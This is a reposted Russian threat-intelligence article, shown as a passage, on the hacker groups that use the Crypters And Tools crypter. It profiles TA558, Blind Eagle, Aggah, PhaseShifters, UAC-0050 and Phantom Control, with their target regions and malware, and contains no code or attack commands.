{"id":458064,"date":"2025-04-29T15:00:23","date_gmt":"2025-04-29T15:00:23","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=458064"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=458064","title":{"rendered":"<span>Crypters And Tools. \u0427\u0430\u0441\u0442\u044c 2: \u0420\u0430\u0437\u043d\u044b\u0435 \u043b\u0430\u043f\u044b \u2014 \u043e\u0434\u0438\u043d \u043a\u043b\u0443\u0431\u043e\u043a<\/span>"},"content":{"rendered":"<div><!--[--><!--]--><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bdf\/b4d\/75c\/bdfb4d75c2c9781b373519224d40b70d.png\" width=\"1798\" height=\"884\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/bdf\/b4d\/75c\/bdfb4d75c2c9781b373519224d40b70d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bdf\/b4d\/75c\/bdfb4d75c2c9781b373519224d40b70d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<details class=\"spoiler\">\n<summary>\u0421\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435<\/summary>\n<div class=\"spoiler__content\">\n<ol>\n<li>\n<p><a href=\"#1\">\u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043d\u0430\u0445\u043e\u0434\u043a\u0438<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#2\">\u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#3\">\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 Crypters And Tools \u0432 \u0430\u0442\u0430\u043a\u0430\u0445<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#4\">PhaseShifters, UAC-0050 \u0438 PhantomControl<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#5\">\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b TA558 \u0438 \u0435\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u044f \u043e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Blind Eagle<\/a><\/p>\n<p>5.1 <a href=\"#5.1\">\u0425\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 URL \u0438 \u0438\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 TA558<\/a><\/p>\n<p>5.2 <a href=\"#5.2\">\u0425\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u044b TA558<\/a><\/p>\n<p>5.3 <a href=\"#5.3\">\u0420\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 TA558 \u0438 Blind Eagle<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#6\">Aggah. \u041d\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0438 \u0441\u0432\u044f\u0437\u044c \u0441 TA558<\/a><\/p>\n<p>6.1 <a href=\"#6.1\">\u041f\u0435\u0440\u0432\u044b\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u044f Aggah<\/a><\/p>\n<p>6.1.1. <a href=\"#6.1.1.\">\u0410\u0442\u0430\u043a\u0438 2018 \u0433\u043e\u0434\u0430<\/a><\/p>\n<p>6.1.2. <a href=\"#6.1.2.\">\u0410\u0442\u0430\u043a\u0438 2019 \u0433\u043e\u0434\u0430<\/a><\/p>\n<p>6.1.3. <a href=\"#6.1.3.\">Hagga (Aggah). \u0420\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438<\/a><\/p>\n<p>6.1.4. <a href=\"#6.1.4.\">\u0410\u0442\u0430\u043a\u0438 2020-2022 \u0433\u043e\u0434\u043e\u0432<\/a><\/p>\n<p>6.2 <a href=\"#6.2\">\u0410\u0442\u0430\u043a\u0438 2023-2025 \u0433\u043e\u0434\u043e\u0432<\/a><\/p>\n<p>6.2.1. <a href=\"#6.2.1.\">\u041e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f Aggah \u0441 TA558<\/a><\/p>\n<p>6.3 <a href=\"#6.3\">\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Crypters And Tools \u0433\u0440\u0443\u043f\u043f\u043e\u0439 Aggah<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#7\">\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Crypters And Tools \u0438 \u0438\u0445 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438<\/a><\/p>\n<p>7.1 <a href=\"#7.1\">bukky101<\/a><\/p>\n<p>7.2 <a href=\"#7.2\">Blind Eagle: deadpoolstart2025 \u0438 ABBAS<\/a><\/p>\n<p>7.3 <a href=\"#7.3\">TA558: Brainiac, syscore \u0438 negrocock<\/a><\/p>\n<p>7.4 <a href=\"#7.4\">KareemHacker<\/a><\/p>\n<p>7.5 <a href=\"#7.5\">HeadMaster<\/a><\/p>\n<p>7.6 <a href=\"#7.6\">\u041e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#8\">\u0412\u044b\u0432\u043e\u0434\u044b<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#9\">\u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0442\u0430\u0442\u0435\u0439 \u0441 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\u00a0<\/a><\/p>\n<\/li>\n<\/ol>\n<\/div>\n<\/details>\n<p><a class=\"anchor\" name=\"1\" id=\"1\"><\/a><\/p>\n<h2>1. \u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043d\u0430\u0445\u043e\u0434\u043a\u0438<\/h2>\n<ul>\n<li>\n<p>\u041a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c, 6 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 Crypters And Tools<\/p>\n<\/li>\n<li>\n<p>\u0427\u0430\u0441\u0442\u044c \u0438\u0437 \u043d\u0438\u0445 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u043c\u0435\u0436\u0434\u0443 \u0441\u043e\u0431\u043e\u0439, \u0447\u0442\u043e \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u0432 \u0441\u0432\u043e\u0451\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438<\/p>\n<\/li>\n<li>\n<p>\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Aggah, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0430\u0441\u044c \u0441 2022 \u0433\u043e\u0434\u0430, \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443<\/p>\n<\/li>\n<li>\n<p>\u041c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Crypters And Tools<\/p>\n<\/li>\n<li>\n<p>\u0427\u0430\u0441\u0442\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043a \u0433\u0440\u0443\u043f\u043f\u0430\u043c Blind Ealge \u0438 TA558 \u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0438\u0445 \u0447\u043b\u0435\u043d\u0430\u043c\u0438<\/p>\n<\/li>\n<\/ul>\n<p><a class=\"anchor\" name=\"2\" id=\"2\"><\/a><\/p>\n<h2>2. \u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0435 Crypters And Tools, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u0442\u0430\u043a \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a. \u041e\u0442\u0447\u0435\u0442 \u043a\u043e\u043d\u0446\u0435\u043d\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0441\u0430\u043c\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430. \u0412 \u044d\u0442\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0435\u043c \u043e \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0435\u0433\u043e \u0432 \u0430\u0442\u0430\u043a\u0430\u0445, \u0438\u0445 \u0441\u0432\u044f\u0437\u044f\u0445, \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 Crypters And Tools, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Aggah \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e \u0447\u0442\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0447\u0438\u0442\u0430\u044e\u0442 2022 \u043a\u043e\u043d\u0446\u043e\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b.<\/p>\n<p>\u041c\u043d\u043e\u0433\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And Tools, \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Ande Loader, \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $codigo, \u0441\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0438 \u0442\u0430\u043a \u0434\u0430\u043b\u0435\u0435) \u0437\u0430 \u0447\u0442\u043e-\u0442\u043e \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u0438 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0438 \u0438\u0445 \u043a \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u043c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c, \u0447\u0442\u043e \u043c\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u043c \u043e\u0448\u0438\u0431\u043a\u043e\u0439.\u00a0 \u0412 \u043a\u043e\u043d\u0446\u0435 \u0441\u0442\u0430\u0442\u044c\u0438 \u043c\u044b \u043f\u0440\u0438\u043b\u043e\u0436\u0438\u043b\u0438 \u0432\u0441\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b, \u0433\u0434\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f Crypters And Tools \u0438\u043b\u0438 \u0435\u0433\u043e \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u2013 Codigo-\u043a\u0440\u0438\u043f\u0442\u0435\u0440\u044b.<\/p>\n<p><a class=\"anchor\" name=\"3\" id=\"3\"><\/a><\/p>\n<h2>3. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 Crypters And Tools \u0432 \u0430\u0442\u0430\u043a\u0430\u0445<\/h2>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\">TA558<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0413\u0440\u0443\u043f\u043f\u0430, \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0441 \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 2018 \u0433\u043e\u0434\u0430, \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044e \u0442\u0443\u0440\u0438\u0437\u043c\u0430 \u0432 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0417\u0430\u043f\u0430\u0434\u043d\u0443\u044e \u0415\u0432\u0440\u043e\u043f\u0443 \u0438 \u0421\u0428\u0410, \u043d\u043e \u043f\u043e\u0437\u0436\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u0441\u0432\u043e\u0438 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0440\u0435\u0433\u0438\u043e\u043d\u044b. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433, \u0441\u0442\u0435\u0433\u0430\u043d\u043e\u0433\u0440\u0430\u0444\u0438\u044e \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u0442\u0430\u043a\u043e\u0435 \u043a\u0430\u043a Agent Tesla, FormBook \u0438 Loda RAT<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Blind Eagle\/APT-C-36<\/p>\n<\/td>\n<td>\n<p align=\"left\">C 2018 \u0433\u043e\u0434\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u042e\u0436\u043d\u0443\u044e \u0410\u043c\u0435\u0440\u0438\u043a\u0443, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u041a\u043e\u043b\u0443\u043c\u0431\u0438\u044e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u042d\u043a\u0432\u0430\u0434\u043e\u0440 \u0438 \u0418\u0441\u043f\u0430\u043d\u0438\u044e. \u041f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0442\u0430\u043a\u043e\u0435 \u043a\u0430\u043a NjRAT, BitRAT, AsyncRAT, \u0444\u043e\u043a\u0443\u0441\u0438\u0440\u0443\u044f\u0441\u044c \u043d\u0430 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Aggah\/Hagga group<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0430\u043a\u0438\u0441\u0442\u0430\u043d\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2018 \u0433\u043e\u0434\u0430. \u041f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0441\u0442\u0440\u0430\u043d, \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0430\u0437\u0438\u0430\u0442\u0441\u043a\u0438\u0435, \u0442\u043e \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0437\u0430 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0443\u044e \u0410\u043c\u0435\u0440\u0438\u043a\u0443. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u041f\u041e, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 3LOSH crypter, RevengeRAT \u0438 AgentTesla<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">PhaseShifters<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0413\u0440\u0443\u043f\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u0430\u0440\u0443\u0441\u0438 \u0438 \u041f\u043e\u043b\u044c\u0448\u0438. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433, \u0441\u0442\u0435\u0433\u0430\u043d\u043e\u0433\u0440\u0430\u0444\u0438\u044e \u0438 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 (GitHub, BitBucket) \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u041f\u041e, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 Rhadamanthys<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">UAC-0050<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0413\u0440\u0443\u043f\u043f\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2020 \u0433\u043e\u0434\u0430 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435, \u043f\u043e\u043b\u044c\u0441\u043a\u0438\u0435 \u0438 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0433\u043e\u0441\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0420\u0430\u0441\u0441\u044b\u043b\u0430\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f\u0441\u044c \u043f\u043e\u0434 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c Remcos RAT, Quasar RAT \u0438 Remote Utilities<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Phantom Control<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u0421 \u0438\u044e\u043b\u044f 2023 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f ScreenConnect, \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 AsyncRAT. \u0412 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0435\u0440\u0435\u0448\u043b\u0438 \u043d\u0430 Ande Loader \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 SwaetRAT. \u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 Blind Eagle<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 1. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 Crypters And Tools<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>Blind Eagle<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>TA558<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>Aggah<\/strong><\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>PhantomControl<\/strong><\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>PhaseShifters<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>UAC-0050<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"6\" data-colwidth=\"117,0,0,117,117,0\" width=\"117\">\n<p align=\"center\">\u0413\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0430\u0442\u0430\u043a<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>\u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/strong>: \u041a\u043e\u043b\u0443\u043c\u0431\u0438\u044f, \u042d\u043a\u0432\u0430\u0434\u043e\u0440, \u0427\u0438\u043b\u0438, \u041f\u0430\u043d\u0430\u043c\u0430, \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u044f<\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/strong>, \u0421\u0435\u0432\u0435\u0440\u043d\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430, \u0417\u0430\u043f\u0430\u0434\u043d\u0430\u044f \u0415\u0432\u0440\u043e\u043f\u0430<\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>\u041b\u0430\u0442\u0438\u043d\u0441\u043a\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430<\/strong>, \u0421\u0435\u0432\u0435\u0440\u043d\u0430\u044f \u0410\u043c\u0435\u0440\u0438\u043a\u0430, \u0417\u0430\u043f\u0430\u0434\u043d\u0430\u044f \u0415\u0432\u0440\u043e\u043f\u0430, \u0411\u043b\u0438\u0436\u043d\u0438\u0439 \u0412\u043e\u0441\u0442\u043e\u043a, \u0412\u043e\u0441\u0442\u043e\u0447\u043d\u0430\u044f \u0410\u0437\u0438\u044f<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\">N\/A<\/p>\n<\/td>\n<td data-colwidth=\"117\" width=\"117\">\n<p align=\"left\"><strong>\u0420\u043e\u0441\u0441\u0438\u044f<\/strong>, 